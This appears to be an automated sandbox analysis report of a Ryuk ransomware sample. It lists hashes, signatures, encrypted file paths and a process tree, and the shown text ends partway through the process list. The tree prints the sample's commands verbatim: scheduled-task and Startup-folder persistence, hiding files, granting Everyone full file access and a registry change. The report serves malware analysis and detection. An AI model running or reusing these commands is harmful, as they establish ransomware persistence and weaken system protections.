Analysis
-
max time kernel
137s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
19-07-2023 14:04
Static task
static1
Behavioral task
behavioral1
Sample
ecd9d8ef99eb98exe_JC.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
ecd9d8ef99eb98exe_JC.exe
Resource
win10v2004-20230703-en
General
-
Target
ecd9d8ef99eb98exe_JC.exe
-
Size
889KB
-
MD5
ecd9d8ef99eb9813fa4eced549ea4d88
-
SHA1
7db7bff4ca9e94bbfe026c2282f3ce36e423f183
-
SHA256
fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
-
SHA512
2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b
-
SSDEEP
12288:GFGYwyCMcRzRjWYgeWYg955/155/KQurE+HG8dSyjCtRronBeSrBa:GFGYtSNBQKEmG8HjCXrUVa
Malware Config
Extracted
C:\ProgramData\RyukReadMe.txt
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Renames multiple (60) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (7863) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe attrib.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 2168 icacls.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\K: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\Q: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\R: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\S: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\T: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\U: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\G: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\L: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\N: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\B: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\X: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\Y: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\M: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\O: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\P: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\W: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\F: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\H: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\I: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\J: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\A: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\V: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\Z: ecd9d8ef99eb98exe_JC.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_KMS_ClientC2R-ul.xrm-ms.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-phn.xrm-ms.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\ui-strings.js.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusEDUR_SubTrial-pl.xrm-ms.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ppd.xrm-ms.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\ui-strings.js.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\trdtv2r41.xsl.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSGR8ES.LEX.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sv-se\ui-strings.js.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\it-it\ui-strings.js.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordVL_MAK-pl.xrm-ms.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH_COL.HXT.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ms.pak.DATA.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core.xml.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp5-ul-oob.xrm-ms.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul-oob.xrm-ms.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\VISSHE.DLL.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\PersonaSpy.js.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\ui-strings.js.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-140.png.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOPRIV.DLL.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_OEM_Perp-pl.xrm-ms.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\STSLISTI.DLL.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\en-US\MSFT_PackageManagement.strings.psd1.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbDownOutline_22_N1.svg.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\ui-strings.js.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\ui-strings.js.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Bold.otf.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\7-Zip\Lang\da.txt.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_CopyDrop32x32.gif.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest2-ppd.xrm-ms.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview.svg.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare.HxS.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_opencarat_18.svg.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins_1.1.200.v20131119-0908.jar.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\eBook.api.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CASCADE\THMBNAIL.PNG.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\es-419.pak.DATA.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSO.DLL.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_KMS_Client_AE-ppd.xrm-ms.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MEDIA\APPLAUSE.WAV.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\delete.svg.[[email protected]].[BB7D8F73].RYK ecd9d8ef99eb98exe_JC.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4364 schtasks.exe 560 schtasks.exe 2472 schtasks.exe 3780 schtasks.exe -
Kills process with taskkill 2 IoCs
pid Process 3828 taskkill.exe 3336 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe 636 ecd9d8ef99eb98exe_JC.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3828 taskkill.exe Token: SeDebugPrivilege 3336 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 636 wrote to memory of 5076 636 ecd9d8ef99eb98exe_JC.exe 87 PID 636 wrote to memory of 5076 636 ecd9d8ef99eb98exe_JC.exe 87 PID 5076 wrote to memory of 4364 5076 cmd.exe 88 PID 5076 wrote to memory of 4364 5076 cmd.exe 88 PID 636 wrote to memory of 2060 636 ecd9d8ef99eb98exe_JC.exe 89 PID 636 wrote to memory of 2060 636 ecd9d8ef99eb98exe_JC.exe 89 PID 636 wrote to memory of 3408 636 ecd9d8ef99eb98exe_JC.exe 90 PID 636 wrote to memory of 3408 636 ecd9d8ef99eb98exe_JC.exe 90 PID 636 wrote to memory of 2052 636 ecd9d8ef99eb98exe_JC.exe 91 PID 636 wrote to memory of 2052 636 ecd9d8ef99eb98exe_JC.exe 91 PID 2052 wrote to memory of 560 2052 cmd.exe 92 PID 2052 wrote to memory of 560 2052 cmd.exe 92 PID 636 wrote to memory of 3812 636 ecd9d8ef99eb98exe_JC.exe 93 PID 636 wrote to memory of 3812 636 ecd9d8ef99eb98exe_JC.exe 93 PID 3812 wrote to memory of 2704 3812 cmd.exe 94 PID 3812 wrote to memory of 2704 3812 cmd.exe 94 PID 636 wrote to memory of 4348 636 ecd9d8ef99eb98exe_JC.exe 96 PID 636 wrote to memory of 4348 636 ecd9d8ef99eb98exe_JC.exe 96 PID 4348 wrote to memory of 2472 4348 cmd.exe 97 PID 4348 wrote to memory of 2472 4348 cmd.exe 97 PID 636 wrote to memory of 2040 636 ecd9d8ef99eb98exe_JC.exe 98 PID 636 wrote to memory of 2040 636 ecd9d8ef99eb98exe_JC.exe 98 PID 2040 wrote to memory of 3780 2040 cmd.exe 99 PID 2040 wrote to memory of 3780 2040 cmd.exe 99 PID 636 wrote to memory of 1584 636 ecd9d8ef99eb98exe_JC.exe 100 PID 636 wrote to memory of 1584 636 ecd9d8ef99eb98exe_JC.exe 100 PID 1584 wrote to memory of 3940 1584 cmd.exe 101 PID 1584 wrote to memory of 3940 1584 cmd.exe 101 PID 636 wrote to memory of 4852 636 ecd9d8ef99eb98exe_JC.exe 102 PID 636 wrote to memory of 4852 636 ecd9d8ef99eb98exe_JC.exe 102 PID 4852 wrote to memory of 2268 4852 cmd.exe 103 PID 4852 wrote to memory of 2268 4852 cmd.exe 103 PID 636 wrote to memory of 4816 636 ecd9d8ef99eb98exe_JC.exe 105 PID 636 wrote to memory of 4816 636 ecd9d8ef99eb98exe_JC.exe 105 PID 4816 wrote to memory of 4392 4816 cmd.exe 106 PID 4816 wrote to memory of 4392 4816 cmd.exe 106 PID 636 wrote to memory of 3344 636 ecd9d8ef99eb98exe_JC.exe 108 PID 636 wrote to memory of 3344 636 ecd9d8ef99eb98exe_JC.exe 108 PID 636 wrote to memory of 3720 636 ecd9d8ef99eb98exe_JC.exe 109 PID 636 wrote to memory of 3720 636 ecd9d8ef99eb98exe_JC.exe 109 PID 3720 wrote to memory of 1380 3720 cmd.exe 110 PID 3720 wrote to memory of 1380 3720 cmd.exe 110 PID 3720 wrote to memory of 3828 3720 cmd.exe 112 PID 3720 wrote to memory of 3828 3720 cmd.exe 112 PID 3344 wrote to memory of 4572 3344 cmd.exe 113 PID 3344 wrote to memory of 4572 3344 cmd.exe 113 PID 4392 wrote to memory of 2168 4392 cmd.exe 115 PID 4392 wrote to memory of 2168 4392 cmd.exe 115 PID 1380 wrote to memory of 3336 1380 cmd.exe 114 PID 1380 wrote to memory of 3336 1380 cmd.exe 114 PID 636 wrote to memory of 3728 636 ecd9d8ef99eb98exe_JC.exe 116 PID 636 wrote to memory of 3728 636 ecd9d8ef99eb98exe_JC.exe 116 PID 636 wrote to memory of 4160 636 ecd9d8ef99eb98exe_JC.exe 118 PID 636 wrote to memory of 4160 636 ecd9d8ef99eb98exe_JC.exe 118 PID 636 wrote to memory of 4996 636 ecd9d8ef99eb98exe_JC.exe 119 PID 636 wrote to memory of 4996 636 ecd9d8ef99eb98exe_JC.exe 119 PID 636 wrote to memory of 3688 636 ecd9d8ef99eb98exe_JC.exe 120 PID 636 wrote to memory of 3688 636 ecd9d8ef99eb98exe_JC.exe 120 PID 636 wrote to memory of 3788 636 ecd9d8ef99eb98exe_JC.exe 121 PID 636 wrote to memory of 3788 636 ecd9d8ef99eb98exe_JC.exe 121 PID 636 wrote to memory of 4440 636 ecd9d8ef99eb98exe_JC.exe 122 PID 636 wrote to memory of 4440 636 ecd9d8ef99eb98exe_JC.exe 122 PID 4440 wrote to memory of 5060 4440 cmd.exe 123 PID 4440 wrote to memory of 5060 4440 cmd.exe 123 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 2704 attrib.exe 3940 attrib.exe 2268 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe"C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
PID:4364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Drops startup file
PID:2060
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵PID:3408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F2⤵
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F3⤵
- Creates scheduled task(s)
PID:560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3812 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"3⤵
- Drops startup file
- Views/modifies file attributes
PID:2704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
PID:2472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F2⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F3⤵
- Creates scheduled task(s)
PID:3780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\system32\attrib.exeattrib +h +s ryuk.exe3⤵
- Views/modifies file attributes
PID:3940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\ryuk.exe3⤵
- Views/modifies file attributes
PID:2268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
PID:2168
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3344 -
